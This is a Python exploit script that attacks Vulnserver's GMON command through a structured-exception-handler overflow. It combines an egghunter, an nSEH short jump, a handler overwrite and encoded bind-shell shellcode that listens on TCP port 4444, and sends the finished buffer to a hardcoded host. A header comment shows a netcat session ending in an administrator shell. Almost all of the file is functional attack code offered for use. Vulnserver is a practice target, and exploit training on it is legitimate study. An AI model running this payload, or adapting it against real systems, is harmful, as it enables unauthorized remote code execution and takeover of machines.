#!/usr/bin/python
# Vulnserver.exe GMON SEH Overflow Exploit by 1N3@CrowdShield
# https://crowdshield.com
#
# nc -v 192.168.101.171 4444
# 192.168.101.171: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.101.171] 4444 (?) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop\vulnserver>whoami
# whoami
# win2k3221\administrator
#
# C:\Documents and Settings\Administrator\Desktop\vulnserver>
import socket, time
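host = "10.0.0.38"
port = 9999

# Every payload piece is a bytes literal so the exact octets reach the wire on
# both Python 2 (where bytes is str) and Python 3 (where a plain "\x.." str
# literal is text and cannot be passed to a socket at all).
nop = b"\x90"

# Egg tag: the 4-byte marker "T00W" written twice, which is exactly what the
# egghunter below scans memory for.  The shellcode must follow it directly.
egg = b"T00WT00W"

# BIND SHELL PORT 4444/TCP + EGG.  The stub opens with fldz/fnstenv/pop (a
# GetPC sequence) and an xor-patch loop, i.e. an encoded payload (looks like
# msfvenom's shikata_ga_nai -- regenerate it rather than hand-editing bytes).
# NOTE(review): a bind shell hands a shell to whoever reaches TCP/4444 first,
# no authentication; isolated lab networks only.
bind_shell = egg + (
    b"\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
    b"\x9e\x13\xb0\x4f\x83\xeb\xfc\xe2\xf4\x62\xfb\x32\x4f"
    b"\x9e\x13\xd0\xc6\x7b\x22\x70\x2b\x15\x43\x80\xc4\xcc"
    b"\x1f\x3b\x1d\x8a\x98\xc2\x67\x91\xa4\xfa\x69\xaf\xec"
    b"\x1c\x73\xff\x6f\xb2\x63\xbe\xd2\x7f\x42\x9f\xd4\x52"
    b"\xbd\xcc\x44\x3b\x1d\x8e\x98\xfa\x73\x15\x5f\xa1\x37"
    b"\x7d\x5b\xb1\x9e\xcf\x98\xe9\x6f\x9f\xc0\x3b\x06\x86"
    b"\xf0\x8a\x06\x15\x27\x3b\x4e\x48\x22\x4f\xe3\x5f\xdc"
    b"\xbd\x4e\x59\x2b\x50\x3a\x68\x10\xcd\xb7\xa5\x6e\x94"
    b"\x3a\x7a\x4b\x3b\x17\xba\x12\x63\x29\x15\x1f\xfb\xc4"
    b"\xc6\x0f\xb1\x9c\x15\x17\x3b\x4e\x4e\x9a\xf4\x6b\xba"
    b"\x48\xeb\x2e\xc7\x49\xe1\xb0\x7e\x4c\xef\x15\x15\x01"
    b"\x5b\xc2\xc3\x7b\x83\x7d\x9e\x13\xd8\x38\xed\x21\xef"
    b"\x1b\xf6\x5f\xc7\x69\x99\xec\x65\xf7\x0e\x12\xb0\x4f"
    b"\xb7\xd7\xe4\x1f\xf6\x3a\x30\x24\x9e\xec\x65\x25\x96"
    b"\x4a\xe0\xad\x63\x53\xe0\x0f\xce\x7b\x5a\x40\x41\xf3"
    b"\x4f\x9a\x09\x7b\xb2\x4f\x8f\x4f\x39\xa9\xf4\x03\xe6"
    b"\x18\xf6\xd1\x6b\x78\xf9\xec\x65\x18\xf6\xa4\x59\x77"
    b"\x61\xec\x65\x18\xf6\x67\x5c\x74\x7f\xec\x65\x18\x09"
    b"\x7b\xc5\x21\xd3\x72\x4f\x9a\xf6\x70\xdd\x2b\x9e\x9a"
    b"\x53\x18\xc9\x44\x81\xb9\xf4\x01\xe9\x19\x7c\xee\xd6"
    b"\x88\xda\x37\x8c\x4e\x9f\x9e\xf4\x6b\x8e\xd5\xb0\x0b"
    b"\xca\x43\xe6\x19\xc8\x55\xe6\x01\xc8\x45\xe3\x19\xf6"
    b"\x6a\x7c\x70\x18\xec\x65\xc6\x7e\x5d\xe6\x09\x61\x23"
    b"\xd8\x47\x19\x0e\xd0\xb0\x4b\xa8\x40\xfa\x3c\x45\xd8"
    b"\xe9\x0b\xae\x2d\xb0\x4b\x2f\xb6\x33\x94\x93\x4b\xaf"
    b"\xeb\x16\x0b\x08\x8d\x61\xdf\x25\x9e\x40\x4f\x9a"
)

# 32-byte syscall egghunter, NOP-padded on both sides (10 before, 3 after).
# It probes memory page by page through int 0x2e / syscall 2 (the classic
# NtAccessCheckAndAuditAlarm hunter on the 32-bit XP/2003 kernels this was
# written against) so unmapped pages do not crash the search:
#   66 81 ca ff 0f   or  dx,0x0fff     ; align to end of page
#   42               inc edx           ; next page / next address
#   52 6a 02 58      push edx; push 2; pop eax
#   cd 2e            int 0x2e          ; is the page readable?
#   3c 05  5a        cmp al,5; pop edx ; 5 == low byte of STATUS_ACCESS_VIOLATION
#   74 ef            je  (next page)
#   b8 54 30 30 57   mov eax,"T00W"
#   8b fa  af        mov edi,edx; scasd
#   75 ea  af        jne (next addr); scasd
#   75 e7            jne (next addr)
#   ff e7            jmp edi           ; tag found twice -> run what follows it
egghunter = (
    nop * 10
    + b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
    + b"\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
    + nop * 3
)

# nSEH: "jmp short -0x30" (EB D0) plus two NOPs to fill the 4-byte slot.
# Measured from the end of the 2-byte jmp that is 46 bytes back, i.e. the last
# byte of the NOP pad in front of the egghunter, so execution slides into it.
shrt_jmp = b"\xEB\xD0\x90\x90"
# SE handler overwrite -- the name is historical; this is the handler slot of
# the SEH record, not a saved EIP.  0x625010B4 little-endian; presumably a
# POP/POP/RET in a non-SafeSEH module of the target (TODO confirm in a
# debugger and re-derive for any other vulnserver / OS build).
eip = b"\xB4\x10\x50\x62"

# Wire layout: GMON command, 3000-NOP sled, egg + shellcode, 88-byte NOP pad,
# egghunter, nSEH, SEH, then 2000 bytes of filler beyond the handler record
# (the overrun is what gets the overwritten handler dispatched).
buffer = (
    b"GMON /.:/"
    + nop * 3000
    + bind_shell
    + nop * 88
    + egghunter
    + shrt_jmp
    + eip
    + b"C" * 2000
)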
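# Deliver the payload.  The timeout is set before connect() so an unreachable
# host fails fast instead of hanging; it also bounds both recv() calls.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
try:
    sock.connect((host, port))
    # The service sends a banner on connect; consume it before the command.
    print(sock.recv(1024))
    time.sleep(1)
    # Report the size, not the raw bytes: the payload is arbitrary binary and
    # would be interpreted as terminal control sequences if printed.
    print("Sending buffer: " + host + ":" + str(port) + " (" + str(len(buffer)) + " bytes)")
    # sendall() on the already-connected stream socket.  sendto() with an
    # address on a connected TCP socket is rejected (EISCONN) on BSD-derived
    # systems, and a bare send() may write only part of a ~5 KB buffer.
    sock.sendall(buffer)
    # Once the handler is hijacked the process stops answering, so a timeout
    # on this read is the expected outcome rather than a failure.
    try:
        print(sock.recv(1024))
    except socket.timeout:
        print("No response within 10s (expected after a successful overflow); try: nc " + host + " 4444")
except socket.error as exc:
    # socket.error (OSError on Python 3) covers refused/reset connections and
    # a timeout on connect(); report the cause instead of a generic message.
    print("socket connection failed! " + str(exc))
finally:
    sock.close()
print("Done!")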